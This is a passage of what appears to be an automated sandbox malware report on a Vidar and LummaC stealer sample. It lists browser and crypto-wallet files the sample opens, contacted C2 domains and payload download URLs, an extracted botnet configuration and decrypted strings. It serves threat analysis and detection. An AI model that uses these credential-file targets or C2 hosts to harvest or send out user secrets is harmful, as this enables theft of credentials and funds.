(Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HCFIIIJJKJ.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1788163394.00000000002FD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350D60 sqlite3_bind_parameter_name,	5_2_6D350D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350C40 sqlite3_bind_zeroblob,	5_2_6D350C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D278EA0 sqlite3_clear_bindings,	5_2_6D278EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D350B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	5_2_6D350B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D276410 bind,WSAGetLastError,	5_2_6D276410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D27C030 sqlite3_bind_parameter_count,	5_2_6D27C030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D276070 PR_Listen,	5_2_6D276070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D27C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	5_2_6D27C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2760B0 listen,WSAGetLastError,	5_2_6D2760B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2763C0 PR_Bind,	5_2_6D2763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2022D0 sqlite3_bind_blob,	5_2_6D2022D0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true
23.197.127.21	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	true
95.164.90.97	kasm.zubairgul.com	Gibraltar	39762	VAKPoltavaUkraineUA	true
147.45.44.104	nsdm.cumpar-auto-orice-tip.ro	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

Contacted Domains

Name	IP	Active
steamcommunity.com	23.197.127.21	true
cowod.hopto.org	45.132.206.251	true
nsdm.cumpar-auto-orice-tip.ro	147.45.44.104	true
t.me	149.154.167.99	true
sergei-esenin.com	104.21.53.8	true
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true
kasm.zubairgul.com	95.164.90.97	true
frizzettei.sbs	unknown	unknown
bemuzzeki.sbs	unknown	unknown
invinjurhey.sbs	unknown	unknown
time.windows.com	unknown	unknown
exilepolsiy.sbs	unknown	unknown
exemplarou.sbs	unknown	unknown
laddyirekyi.sbs	unknown	unknown
wickedneatr.sbs	unknown	unknown
isoplethui.sbs	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
frizzettei.sbs	true	0%, Virustotal, Browse	unknown
http://kasm.zubairgul.com/freebl3.dll	true		unknown
laddyirekyi.sbs	true	0%, Virustotal, Browse	unknown
http://kasm.zubairgul.com/nss3.dll	true		unknown
isoplethui.sbs	true	0%, Virustotal, Browse	unknown
http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe	false	18%, Virustotal, Browse	unknown
http://kasm.zubairgul.com/	true	0%, Virustotal, Browse	unknown
http://kasm.zubairgul.com/sql.dll	true	0%, Virustotal, Browse	unknown
http://kasm.zubairgul.com/vcruntime140.dll	true		unknown
http://kasm.zubairgul.com/softokn3.dll	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
invinjurhey.sbs	true		unknown
http://cowod.hopto.org/	true		unknown
exilepolsiy.sbs	true		unknown
https://t.me/maslengdsa	true		unknown
https://steamcommunity.com/profiles/76561199786602107	true		unknown
bemuzzeki.sbs	true		unknown
http://kasm.zubairgul.com/msvcp140.dll	true		unknown
exemplarou.sbs	true		unknown
http://kasm.zubairgul.com/mozglue.dll	true		unknown
wickedneatr.sbs	true		unknown
https://sergei-esenin.com/api	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VmRHSCaiyc.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\HCFIIIJJKJ.exe	Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310458

Found malware configuration

Source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/maslengdsa"], "Botnet": "4a5bc8b73e12425adc3c399da8136891"}
Source: 16.2.MSBuild.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["laddyirekyi.sbs", "frizzettei.sbs", "bemuzzeki.sbs", "exemplarou.sbs", "invinjurhey.sbs", "isoplethui.sbs", "exilepolsiy.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for domain / URL

Source: cowod.hopto.org	Virustotal: Detection: 10%	Perma Link
Source: nsdm.cumpar-auto-orice-tip.ro	Virustotal: Detection: 8%	Perma Link
Source: sergei-esenin.com	Virustotal: Detection: 11%	Perma Link
Source: exemplarou.sbs	Virustotal: Detection: 6%	Perma Link
Source: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe	Virustotal: Detection: 17%	Perma Link
Source: http://cowod.hopto.org	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: VmRHSCaiyc.exe	ReversingLabs: Detection: 50%
Source: VmRHSCaiyc.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\HCFIIIJJKJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: VmRHSCaiyc.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wickedneatr.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: invinjurhey.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: laddyirekyi.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exilepolsiy.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bemuzzeki.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exemplarou.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: isoplethui.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: frizzettei.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exemplarou.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	5_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	5_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	5_2_00411E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	5_2_0040A7AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	5_2_6D2CA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D3125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	5_2_6D3125B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D294420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	5_2_6D294420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C4440 PK11_PrivDecrypt,	5_2_6D2C4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C44C0 PK11_PubEncrypt,	5_2_6D2C44C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	5_2_6D2EA730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A8670 PK11_ExportEncryptedPrivKeyInfo,	5_2_6D2A8670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	5_2_6D2CA650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	5_2_6D2AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	5_2_6D2F0180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C43B0 PK11_PubEncryptPKCS1,PR_SetError,	5_2_6D2C43B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	5_2_6D2EBD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	5_2_6D2A7D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	5_2_6D2E7C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C3FF0 PK11_PrivDecryptPKCS1,	5_2_6D2C3FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	5_2_6D2E9EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	5_2_6D2C9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	5_2_6D2C3850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EDA40 SEC_PKCS7ContentIsEncrypted,	5_2_6D2EDA40

Uses 32bit PE files

Source: VmRHSCaiyc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49990 version: TLS 1.2

Source: VmRHSCaiyc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000005.00000002.1800280648.00000000381EE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000005.00000002.1794363422.000000002C30A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00369ABF FindFirstFileExW,	4_2_00369ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00416013
